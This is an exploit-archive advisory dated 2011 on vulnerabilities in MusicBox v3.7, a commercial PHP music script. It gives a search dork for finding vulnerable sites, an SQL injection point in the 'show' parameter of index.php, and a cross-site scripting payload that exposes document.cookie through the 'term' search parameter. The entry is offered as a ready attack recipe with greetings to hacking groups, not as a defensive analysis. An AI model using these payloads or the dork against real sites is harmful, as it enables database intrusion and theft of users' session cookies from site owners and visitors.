Musicbox v3.7 and previous version Multiple Vulnerabilites

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Musicbox v3.7 and previous version Multiple Vulnerabilites
# Published : 2011-07-25
# Author :
# Previous Title : PG eLMS Pro vDEC_2007_01 Multiple Blind SQL Injection Vulnerabilities
# Next Title : FCKeditor all versian Arbitrary File Upload Vulnerability

============================================================
MusicBox <= v3.7 Multiple Vulnerabilities
============================================================


[~] Author : R@1D3N (amin emami)

[~] Software Link : www.musicboxv2.com

[~] Price : $275

[~] Version : v3.7 and previous versions

[~] Contact : aminrayden@yahoo.com <~

[~] DorK : inurl:genre_artists.php

[~] Forum : http://ashiyane.org/forums/

[~] Greetz :ItSecTeam, Inj3ct0r, Exploit-db

[~] Tested on: Windows XP Sp3

vul1.sql injection:

/[Path]/index.php?action=top&type=Songs&show=10'[ SQL ATTACK]

Vul2.Cross site Scripting:

/[path]/index.php?in=song&term="><script>alert(document.cookie)<%2Fscript>&action=search&start=0